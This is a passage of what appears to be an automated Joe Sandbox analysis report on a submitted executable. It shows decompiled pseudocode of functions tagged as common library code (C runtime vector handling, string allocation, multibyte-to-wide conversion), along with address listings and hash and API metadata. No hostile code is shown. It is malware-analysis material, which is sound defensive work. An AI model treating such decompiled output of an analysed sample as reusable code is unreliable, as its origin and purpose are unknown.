					_t306 =  *((intOrPtr*)(_t344 + 0x24));
					if(_t306 == 0 || _t321 >= (0x2aaaaaab * ( *((intOrPtr*)(_t344 + 0x28)) - _t306) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t344 + 0x28)) - _t306) >> 0x20 >> 1)) {
						break;
					}
					_t232 = E0041AFA1(_t244,  *((intOrPtr*)(_t344 + 0x40)),  *((intOrPtr*)(_t244 + _t306)),  *((intOrPtr*)(_t344 + 0x40)));
					_t344 = _t344 + 8;
					if(_t232 == 0) {
						_t233 =  *((intOrPtr*)(_t344 + 0x24));
						__eflags = _t233 -  *((intOrPtr*)(_t344 + 0x28));
						_t317 = _t233;
						if(_t233 >  *((intOrPtr*)(_t344 + 0x28))) {
							E0041AD33();
							_t233 =  *((intOrPtr*)(_t344 + 0x24));
						}
						_t333 = _t317 + (_t321 + _t321 * 2) * 4;
						__eflags = _t333 -  *((intOrPtr*)(_t344 + 0x28));
						if(_t333 >  *((intOrPtr*)(_t344 + 0x28))) {
							L20:
							E0041AD33();
						} else {
							__eflags = _t333 - _t233;
							if(_t333 < _t233) {
								goto L20;
							}
						}
						_t303 =  *((intOrPtr*)(_t344 + 0x28));
						_t235 = _t333 + 0xc;
						__eflags = _t235 - _t303;
						if(_t235 != _t303) {
							_t282 = _t235 - 0xc;
							do {
								 *_t282 =  *_t235;
								 *((intOrPtr*)(_t282 + 4)) =  *((intOrPtr*)(_t235 + 4));
								 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t235 + 8));
								_t235 = _t235 + 0xc;
								_t282 = _t282 + 0xc;
								__eflags = _t235 - _t303;
							} while (_t235 != _t303);
						}
						_t43 = _t344 + 0x28;
						 *_t43 =  *((intOrPtr*)(_t344 + 0x28)) - 0xc;
						__eflags =  *_t43;
					} else {
						_t321 = _t321 + 1;
						_t244 = _t244 + 0xc;
						continue;
					}
					break;
				}
				_t322 = __imp__#2;
				 *((intOrPtr*)(_t344 + 0x14)) =  *_t322( *((intOrPtr*)(_t344 + 0x40)));
				_t173 =  *((intOrPtr*)(_t344 + 0x44));
				_t307 = 0;
				__eflags = _t173;
				if(_t173 == 0) {
					 *((intOrPtr*)(_t344 + 0x18)) = 0;
				} else {
					 *((intOrPtr*)(_t344 + 0x18)) =  *_t322(_t173);
				}
				_t174 =  *((intOrPtr*)(_t344 + 0x48));
				__eflags = _t174 - _t307;
				if(_t174 == _t307) {
					 *((intOrPtr*)(_t344 + 0x1c)) = _t307;
				} else {
					 *((intOrPtr*)(_t344 + 0x1c)) =  *_t322(_t174);
				}
				E0040B0F0(_t344 + 0x24, _t344 + 0x14);
				__eflags =  *((char*)(_t344 + 0x4c));
				if( *((char*)(_t344 + 0x4c)) == 0) {
					_t308 =  *((intOrPtr*)(_t339 + 0x18));
					__eflags =  *((intOrPtr*)(_t339 + 0x14)) - _t308;
					_t323 = _t339 + 0x10;
					if( *((intOrPtr*)(_t339 + 0x14)) > _t308) {
						E0041AD33();
					}
					_t246 =  *((intOrPtr*)(_t323 + 4));
					__eflags = _t246 -  *((intOrPtr*)(_t323 + 8));
					if(_t246 >  *((intOrPtr*)(_t323 + 8))) {
						E0041AD33();
					}
					__eflags = _t246 - _t308;
					if(_t246 != _t308) {
						_t342 =  *((intOrPtr*)(_t323 + 8));
						__eflags = _t308 - _t342;
						_t291 = _t246 + ((0x2aaaaaab * (_t342 - _t308) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t342 - _t308) >> 0x20 >> 1) + ((0x2aaaaaab * (_t342 - _t308) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t342 - _t308) >> 0x20 >> 1)) * 2) * 4;
						_t199 = _t308;
						if(_t308 != _t342) {
							_t267 = _t246 - _t308;
							__eflags = _t267;
							do {
								 *((intOrPtr*)(_t267 + _t199)) =  *_t199;
								 *((intOrPtr*)(_t267 + _t199 + 4)) =  *((intOrPtr*)(_t199 + 4));
								 *((intOrPtr*)(_t267 + _t199 + 8)) =  *((intOrPtr*)(_t199 + 8));
								_t199 = _t199 + 0xc;
								__eflags = _t199 - _t342;
							} while (_t199 != _t342);
						}
						 *((intOrPtr*)(_t323 + 8)) = _t291;
					}
					_t254 =  *((intOrPtr*)(_t344 + 0x28));
					_t177 =  *((intOrPtr*)(_t344 + 0x24));
					__eflags = _t177 - _t254;
					 *((intOrPtr*)(_t344 + 0x4c)) = _t254;
					if(_t177 > _t254) {
						E0041AD33();
						_t254 =  *((intOrPtr*)(_t344 + 0x28));
						_t177 =  *((intOrPtr*)(_t344 + 0x24));
					}
					__eflags = _t177 - _t254;
					 *((intOrPtr*)(_t344 + 0x40)) = _t177;
					if(_t177 > _t254) {
						E0041AD33();
					}
					_t309 =  *((intOrPtr*)(_t323 + 8));
					__eflags =  *((intOrPtr*)(_t323 + 4)) - _t309;
					if( *((intOrPtr*)(_t323 + 4)) > _t309) {
						E0041AD33();
					}
					_t247 =  *((intOrPtr*)(_t323 + 4));
					__eflags = _t247 -  *((intOrPtr*)(_t323 + 8));
					if(_t247 >  *((intOrPtr*)(_t323 + 8))) {
						E0041AD33();
					}
					__eflags = _t247 - _t309;
					if(_t247 != _t309) {
						_t341 =  *((intOrPtr*)(_t323 + 8));
						__eflags = _t309 - _t341;
						_t288 = _t247 + ((0x2aaaaaab * (_t341 - _t309) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t341 - _t309) >> 0x20 >> 1) + ((0x2aaaaaab * (_t341 - _t309) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t341 - _t309) >> 0x20 >> 1)) * 2) * 4;
						_t188 = _t309;
						if(_t309 != _t341) {
							_t263 = _t247 - _t309;
							__eflags = _t263;
							do {
								 *((intOrPtr*)(_t263 + _t188)) =  *_t188;
								 *((intOrPtr*)(_t263 + _t188 + 4)) =  *((intOrPtr*)(_t188 + 4));
								 *((intOrPtr*)(_t263 + _t188 + 8)) =  *((intOrPtr*)(_t188 + 8));
								_t188 = _t188 + 0xc;
								__eflags = _t188 - _t341;
							} while (_t188 != _t341);
						}
						 *((intOrPtr*)(_t323 + 8)) = _t288;
					}
					_t307 =  *((intOrPtr*)(_t323 + 4));
					__eflags = _t307 -  *((intOrPtr*)(_t323 + 8));
					if(_t307 >  *((intOrPtr*)(_t323 + 8))) {
						E0041AD33();
					}
					_push( *((intOrPtr*)(_t344 + 0x4c)));
					_push( *((intOrPtr*)(_t344 + 0x4c)));
					_t179 = _t344 + 0x28;
					_push(_t179);
					_push( *((intOrPtr*)(_t344 + 0x40)));
					_push(_t179);
					_push(_t307);
					_push(_t323);
					_t256 = _t323;
				} else {
					_t325 =  *((intOrPtr*)(_t339 + 8));
					__eflags =  *((intOrPtr*)(_t339 + 4)) - _t325;
					if( *((intOrPtr*)(_t339 + 4)) > _t325) {
						E0041AD33();
					}
					_t249 =  *((intOrPtr*)(_t339 + 4));
					__eflags = _t249 -  *((intOrPtr*)(_t339 + 8));
					if(_t249 >  *((intOrPtr*)(_t339 + 8))) {
						E0041AD33();
					}
					__eflags = _t249 - _t325;
					if(_t249 != _t325) {
						_t307 =  *((intOrPtr*)(_t339 + 8));
						__eflags = _t325 - _t307;
						_t299 = _t249 + ((0x2aaaaaab * (_t307 - _t325) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t307 - _t325) >> 0x20 >> 1) + ((0x2aaaaaab * (_t307 - _t325) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t307 - _t325) >> 0x20 >> 1)) * 2) * 4;
						_t221 = _t325;
						if(_t325 != _t307) {
							_t278 = _t249 - _t325;
							__eflags = _t278;
							do {
								 *((intOrPtr*)(_t278 + _t221)) =  *_t221;
								 *((intOrPtr*)(_t278 + _t221 + 4)) =  *((intOrPtr*)(_t221 + 4));
								 *((intOrPtr*)(_t278 + _t221 + 8)) =  *((intOrPtr*)(_t221 + 8));
								_t221 = _t221 + 0xc;
								__eflags = _t221 - _t307;
							} while (_t221 != _t307);
						}
						 *((intOrPtr*)(_t339 + 8)) = _t299;
					}
					_t268 =  *((intOrPtr*)(_t344 + 0x28));
					_t202 =  *((intOrPtr*)(_t344 + 0x24));
					__eflags = _t202 - _t268;
					 *((intOrPtr*)(_t344 + 0x4c)) = _t268;
					if(_t202 > _t268) {
						E0041AD33();
						_t268 =  *((intOrPtr*)(_t344 + 0x28));
						_t202 =  *((intOrPtr*)(_t344 + 0x24));
					}
					__eflags = _t202 - _t268;
					 *((intOrPtr*)(_t344 + 0x40)) = _t202;
					if(_t202 > _t268) {
						E0041AD33();
					}
					_t326 =  *((intOrPtr*)(_t339 + 8));
					__eflags =  *((intOrPtr*)(_t339 + 4)) - _t326;
					if( *((intOrPtr*)(_t339 + 4)) > _t326) {
						E0041AD33();
					}
					_t247 =  *((intOrPtr*)(_t339 + 4));
					__eflags = _t247 -  *((intOrPtr*)(_t339 + 8));
					if(_t247 >  *((intOrPtr*)(_t339 + 8))) {
						E0041AD33();
					}
					__eflags = _t247 - _t326;
					if(_t247 != _t326) {
						_t307 =  *((intOrPtr*)(_t339 + 8));
						__eflags = _t326 - _t307;
						_t296 = _t247 + ((0x2aaaaaab * (_t307 - _t326) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t307 - _t326) >> 0x20 >> 1) + ((0x2aaaaaab * (_t307 - _t326) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * (_t307 - _t326) >> 0x20 >> 1)) * 2) * 4;
						_t211 = _t326;
						if(_t326 != _t307) {
							_t273 = _t247 - _t326;
							__eflags = _t273;
							do {
								 *((intOrPtr*)(_t273 + _t211)) =  *_t211;
								 *((intOrPtr*)(_t273 + _t211 + 4)) =  *((intOrPtr*)(_t211 + 4));
								 *((intOrPtr*)(_t273 + _t211 + 8)) =  *((intOrPtr*)(_t211 + 8));
								_t211 = _t211 + 0xc;
								__eflags = _t211 - _t307;
							} while (_t211 != _t307);
						}
						 *((intOrPtr*)(_t339 + 8)) = _t296;
					}
					_t323 =  *((intOrPtr*)(_t339 + 4));
					__eflags = _t323 -  *((intOrPtr*)(_t339 + 8));
					if(_t323 >  *((intOrPtr*)(_t339 + 8))) {
						E0041AD33();
					}
					_push( *((intOrPtr*)(_t344 + 0x4c)));
					_push( *((intOrPtr*)(_t344 + 0x4c)));
					_t204 = _t344 + 0x28;
					_push(_t204);
					_push( *((intOrPtr*)(_t344 + 0x40)));
					_push(_t204);
					_push(_t323);
					_push(_t339);
					_t256 = _t339;
				}
				E00409800(_t256);
				_t181 =  *((intOrPtr*)(_t344 + 0x24));
				__eflags = _t181;
				if(__eflags != 0) {
					_push(_t181);
					_t181 = L0041A97D(_t247, _t307, _t323, __eflags);
					_t344 = _t344 + 4;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t344 + 0x30));
				return _t181;
			}


























































                                                                                                                              0x0040b250
                                                                                                                              0x0040b252
                                                                                                                              0x0040b25d
                                                                                                                              0x0040b25e
                                                                                                                              0x0040b265
                                                                                                                              0x0040b26c
                                                                                                                              0x0040b271
                                                                                                                              0x0040b277
                                                                                                                              0x0040b279
                                                                                                                              0x0040b27b
                                                                                                                              0x0040b27f
                                                                                                                              0x0040b283
                                                                                                                              0x0040b28b
                                                                                                                              0x0040b28f
                                                                                                                              0x0040b2bf
                                                                                                                              0x0040b2c2
                                                                                                                              0x0040b2c5
                                                                                                                              0x0040b2c8
                                                                                                                              0x0040b2ca
                                                                                                                              0x0040b2ca
                                                                                                                              0x0040b2cf
                                                                                                                              0x0040b2d2
                                                                                                                              0x0040b2d5
                                                                                                                              0x0040b2d7
                                                                                                                              0x0040b2d7
                                                                                                                              0x0040b2e0
                                                                                                                              0x0040b2e9
                                                                                                                              0x0040b2ee
                                                                                                                              0x0040b2ee
                                                                                                                              0x0040b291
                                                                                                                              0x0040b291
                                                                                                                              0x0040b297
                                                                                                                              0x0040b299
                                                                                                                              0x0040b299
                                                                                                                              0x0040b29e
                                                                                                                              0x0040b2a4
                                                                                                                              0x0040b2a6
                                                                                                                              0x0040b2a6
                                                                                                                              0x0040b2af
                                                                                                                              0x0040b2b8
                                                                                                                              0x0040b2b8
                                                                                                                              0x0040b2f0
                                                                                                                              0x0040b2f2
                                                                                                                              0x0040b2f2
                                                                                                                              0x0040b2f8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040b321
                                                                                                                              0x0040b326
                                                                                                                              0x0040b32b
                                                                                                                              0x0040b335
                                                                                                                              0x0040b339
                                                                                                                              0x0040b33d
                                                                                                                              0x0040b33f
                                                                                                                              0x0040b341
                                                                                                                              0x0040b346
                                                                                                                              0x0040b346
                                                                                                                              0x0040b34d
                                                                                                                              0x0040b350
                                                                                                                              0x0040b354
                                                                                                                              0x0040b35a
                                                                                                                              0x0040b35a
                                                                                                                              0x0040b356
                                                                                                                              0x0040b356
                                                                                                                              0x0040b358
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040b358
                                                                                                                              0x0040b35f
                                                                                                                              0x0040b363
                                                                                                                              0x0040b366
                                                                                                                              0x0040b368
                                                                                                                              0x0040b36a
                                                                                                                              0x0040b370
                                                                                                                              0x0040b372
                                                                                                                              0x0040b377
                                                                                                                              0x0040b37d
                                                                                                                              0x0040b380
                                                                                                                              0x0040b383
                                                                                                                              0x0040b386
                                                                                                                              0x0040b386
                                                                                                                              0x0040b370
                                                                                                                              0x0040b38a
                                                                                                                              0x0040b38a
                                                                                                                              0x0040b38a
                                                                                                                              0x0040b32d
                                                                                                                              0x0040b32d
                                                                                                                              0x0040b330
                                                                                                                              0x00000000
                                                                                                                              0x0040b330
                                                                                                                              0x00000000
                                                                                                                              0x0040b32b
                                                                                                                              0x0040b393
                                                                                                                              0x0040b39c
                                                                                                                              0x0040b3a0
                                                                                                                              0x0040b3a4
                                                                                                                              0x0040b3a6
                                                                                                                              0x0040b3a8
                                                                                                                              0x0040b3b3
                                                                                                                              0x0040b3aa
                                                                                                                              0x0040b3ad
                                                                                                                              0x0040b3ad
                                                                                                                              0x0040b3b7
                                                                                                                              0x0040b3bb
                                                                                                                              0x0040b3bd
                                                                                                                              0x0040b3c8
                                                                                                                              0x0040b3bf
                                                                                                                              0x0040b3c2
                                                                                                                              0x0040b3c2
                                                                                                                              0x0040b3d5
                                                                                                                              0x0040b3da
                                                                                                                              0x0040b3df
                                                                                                                              0x0040b508
                                                                                                                              0x0040b50b
                                                                                                                              0x0040b50e
                                                                                                                              0x0040b511
                                                                                                                              0x0040b513
                                                                                                                              0x0040b513
                                                                                                                              0x0040b518
                                                                                                                              0x0040b51b
                                                                                                                              0x0040b51e
                                                                                                                              0x0040b520
                                                                                                                              0x0040b520
                                                                                                                              0x0040b525
                                                                                                                              0x0040b527
                                                                                                                              0x0040b529
                                                                                                                              0x0040b540
                                                                                                                              0x0040b545
                                                                                                                              0x0040b548
                                                                                                                              0x0040b54a
                                                                                                                              0x0040b54e
                                                                                                                              0x0040b54e
                                                                                                                              0x0040b550
                                                                                                                              0x0040b552
                                                                                                                              0x0040b558
                                                                                                                              0x0040b55f
                                                                                                                              0x0040b563
                                                                                                                              0x0040b566
                                                                                                                              0x0040b566
                                                                                                                              0x0040b550
                                                                                                                              0x0040b56a
                                                                                                                              0x0040b56a
                                                                                                                              0x0040b56d
                                                                                                                              0x0040b571
                                                                                                                              0x0040b575
                                                                                                                              0x0040b577
                                                                                                                              0x0040b57b
                                                                                                                              0x0040b57d
                                                                                                                              0x0040b582
                                                                                                                              0x0040b586
                                                                                                                              0x0040b586
                                                                                                                              0x0040b58a
                                                                                                                              0x0040b58c
                                                                                                                              0x0040b590
                                                                                                                              0x0040b592
                                                                                                                              0x0040b592
                                                                                                                              0x0040b597
                                                                                                                              0x0040b59a
                                                                                                                              0x0040b59d
                                                                                                                              0x0040b59f
                                                                                                                              0x0040b59f
                                                                                                                              0x0040b5a4
                                                                                                                              0x0040b5a7
                                                                                                                              0x0040b5aa
                                                                                                                              0x0040b5ac
                                                                                                                              0x0040b5ac
                                                                                                                              0x0040b5b1
                                                                                                                              0x0040b5b3
                                                                                                                              0x0040b5b5
                                                                                                                              0x0040b5cc
                                                                                                                              0x0040b5d1
                                                                                                                              0x0040b5d4
                                                                                                                              0x0040b5d6
                                                                                                                              0x0040b5da
                                                                                                                              0x0040b5da
                                                                                                                              0x0040b5e0
                                                                                                                              0x0040b5e2
                                                                                                                              0x0040b5e8
                                                                                                                              0x0040b5ef
                                                                                                                              0x0040b5f3
                                                                                                                              0x0040b5f6
                                                                                                                              0x0040b5f6
                                                                                                                              0x0040b5e0
                                                                                                                              0x0040b5fa
                                                                                                                              0x0040b5fa
                                                                                                                              0x0040b5fd
                                                                                                                              0x0040b600
                                                                                                                              0x0040b603
                                                                                                                              0x0040b605
                                                                                                                              0x0040b605
                                                                                                                              0x0040b616
                                                                                                                              0x0040b617
                                                                                                                              0x0040b618
                                                                                                                              0x0040b61c
                                                                                                                              0x0040b61d
                                                                                                                              0x0040b61e
                                                                                                                              0x0040b61f
                                                                                                                              0x0040b620
                                                                                                                              0x0040b621
                                                                                                                              0x0040b3e5
                                                                                                                              0x0040b3e5
                                                                                                                              0x0040b3e8
                                                                                                                              0x0040b3eb
                                                                                                                              0x0040b3ed
                                                                                                                              0x0040b3ed
                                                                                                                              0x0040b3f2
                                                                                                                              0x0040b3f5
                                                                                                                              0x0040b3f8
                                                                                                                              0x0040b3fa
                                                                                                                              0x0040b3fa
                                                                                                                              0x0040b3ff
                                                                                                                              0x0040b401
                                                                                                                              0x0040b403
                                                                                                                              0x0040b41a
                                                                                                                              0x0040b41f
                                                                                                                              0x0040b422
                                                                                                                              0x0040b424
                                                                                                                              0x0040b428
                                                                                                                              0x0040b428
                                                                                                                              0x0040b430
                                                                                                                              0x0040b432
                                                                                                                              0x0040b438
                                                                                                                              0x0040b43f
                                                                                                                              0x0040b443
                                                                                                                              0x0040b446
                                                                                                                              0x0040b446
                                                                                                                              0x0040b430
                                                                                                                              0x0040b44a
                                                                                                                              0x0040b44a
                                                                                                                              0x0040b44d
                                                                                                                              0x0040b451
                                                                                                                              0x0040b455
                                                                                                                              0x0040b457
                                                                                                                              0x0040b45b
                                                                                                                              0x0040b45d
                                                                                                                              0x0040b462
                                                                                                                              0x0040b466
                                                                                                                              0x0040b466
                                                                                                                              0x0040b46a
                                                                                                                              0x0040b46c
                                                                                                                              0x0040b470
                                                                                                                              0x0040b472
                                                                                                                              0x0040b472
                                                                                                                              0x0040b477
                                                                                                                              0x0040b47a
                                                                                                                              0x0040b47d
                                                                                                                              0x0040b47f
                                                                                                                              0x0040b47f
                                                                                                                              0x0040b484
                                                                                                                              0x0040b487
                                                                                                                              0x0040b48a
                                                                                                                              0x0040b48c
                                                                                                                              0x0040b48c
                                                                                                                              0x0040b491
                                                                                                                              0x0040b493
                                                                                                                              0x0040b495
                                                                                                                              0x0040b4ac
                                                                                                                              0x0040b4b1
                                                                                                                              0x0040b4b4
                                                                                                                              0x0040b4b6
                                                                                                                              0x0040b4ba
                                                                                                                              0x0040b4ba
                                                                                                                              0x0040b4c0
                                                                                                                              0x0040b4c2
                                                                                                                              0x0040b4c8
                                                                                                                              0x0040b4cf
                                                                                                                              0x0040b4d3
                                                                                                                              0x0040b4d6
                                                                                                                              0x0040b4d6
                                                                                                                              0x0040b4c0
                                                                                                                              0x0040b4da
                                                                                                                              0x0040b4da
                                                                                                                              0x0040b4dd
                                                                                                                              0x0040b4e0
                                                                                                                              0x0040b4e3
                                                                                                                              0x0040b4e5
                                                                                                                              0x0040b4e5
                                                                                                                              0x0040b4f6
                                                                                                                              0x0040b4f7
                                                                                                                              0x0040b4f8
                                                                                                                              0x0040b4fc
                                                                                                                              0x0040b4fd
                                                                                                                              0x0040b4fe
                                                                                                                              0x0040b4ff
                                                                                                                              0x0040b500
                                                                                                                              0x0040b501
                                                                                                                              0x0040b501
                                                                                                                              0x0040b623
                                                                                                                              0x0040b628
                                                                                                                              0x0040b62c
                                                                                                                              0x0040b62e
                                                                                                                              0x0040b630
                                                                                                                              0x0040b631
                                                                                                                              0x0040b636
                                                                                                                              0x0040b636
                                                                                                                              0x0040b63d
                                                                                                                              0x0040b64c

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString$__wcsicmp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3384154206-0
                                                                                                                              • Opcode ID: d95c90f054ff2db64346cba7a6fff06acb8de76c58159a3b358f3e3913cf5986
                                                                                                                              • Instruction ID: f9b97b926f254baac606fdfe53c1fee865bf1d70f85062ac769717ac28dcf10f
                                                                                                                              • Opcode Fuzzy Hash: d95c90f054ff2db64346cba7a6fff06acb8de76c58159a3b358f3e3913cf5986
                                                                                                                              • Instruction Fuzzy Hash: 0FD1A271A042009FC724DF19C98086EB7F6EF84304B59896EF899AB391D735ED41CBDA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00973822 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustPointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1740715915-0
                                                                                                                              • Opcode ID: a3d4ea5da06016408e6dcb409c1b9bb3a86ab74bc41b2ffa1fc539a1d226b0ca
                                                                                                                              • Instruction ID: e94dedb96162e42aad96aa082386ed10b2546f066f536d7a5d43ca8ca89a728d
                                                                                                                              • Opcode Fuzzy Hash: a3d4ea5da06016408e6dcb409c1b9bb3a86ab74bc41b2ffa1fc539a1d226b0ca
                                                                                                                              • Instruction Fuzzy Hash: A751F373605206EFDB298F51D841BBAB3A8FF80710F14C52DEA4D47291D771AE80E780
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00429C65 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00429C65(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0041AE10( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00420E90( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0041B805(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xff000002
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xff000002
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xff000002
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                              0x00429c6d
                                                                                                                              0x00429c74
                                                                                                                              0x00429c89
                                                                                                                              0x00000000
                                                                                                                              0x00429c7b
                                                                                                                              0x00429c7d
                                                                                                                              0x00429c95
                                                                                                                              0x00429c9a
                                                                                                                              0x00429c9d
                                                                                                                              0x00429ca0
                                                                                                                              0x00429cc9
                                                                                                                              0x00429cce
                                                                                                                              0x00429cd2
                                                                                                                              0x00429d53
                                                                                                                              0x00429d65
                                                                                                                              0x00429d6e
                                                                                                                              0x00429d70
                                                                                                                              0x00429cb0
                                                                                                                              0x00429cb0
                                                                                                                              0x00429cb3
                                                                                                                              0x00429cb5
                                                                                                                              0x00429cb8
                                                                                                                              0x00429cb8
                                                                                                                              0x00429cb8
                                                                                                                              0x00429cb8
                                                                                                                              0x00000000
                                                                                                                              0x00429cbe
                                                                                                                              0x00429d32
                                                                                                                              0x00429d32
                                                                                                                              0x00429d37
                                                                                                                              0x00429d3d
                                                                                                                              0x00429d40
                                                                                                                              0x00429d42
                                                                                                                              0x00429d45
                                                                                                                              0x00429d45
                                                                                                                              0x00429d45
                                                                                                                              0x00429d45
                                                                                                                              0x00000000
                                                                                                                              0x00429d49
                                                                                                                              0x00429cd4
                                                                                                                              0x00429cd7
                                                                                                                              0x00429cd7
                                                                                                                              0x00429cdd
                                                                                                                              0x00429ce0
                                                                                                                              0x00429d07
                                                                                                                              0x00429d0a
                                                                                                                              0x00429d0a
                                                                                                                              0x00429d10
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429d12
                                                                                                                              0x00429d15
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429d17
                                                                                                                              0x00429d17
                                                                                                                              0x00429d1a
                                                                                                                              0x00429d1a
                                                                                                                              0x00429d20
                                                                                                                              0x00429c8e
                                                                                                                              0x00429c8e
                                                                                                                              0x00429d29
                                                                                                                              0x00000000
                                                                                                                              0x00429d29
                                                                                                                              0x00429ce2
                                                                                                                              0x00429ce5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429ce9
                                                                                                                              0x00429cf7
                                                                                                                              0x00429cfa
                                                                                                                              0x00429d00
                                                                                                                              0x00429d02
                                                                                                                              0x00429d05
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00429d05
                                                                                                                              0x00429ca2
                                                                                                                              0x00429ca5
                                                                                                                              0x00429ca7
                                                                                                                              0x00429cad
                                                                                                                              0x00429cad
                                                                                                                              0x00000000
                                                                                                                              0x00429c7f
                                                                                                                              0x00429c7f
                                                                                                                              0x00429c84
                                                                                                                              0x00429c86
                                                                                                                              0x00429c86
                                                                                                                              0x00000000
                                                                                                                              0x00429c84
                                                                                                                              0x00429c7d

                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00429C95
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00429CC9
                                                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,FF000002,?,00000000,?,?,?,00429498,?,?,00000001), ref: 00429CFA
                                                                                                                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00429498,?,?,00000001), ref: 00429D68
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
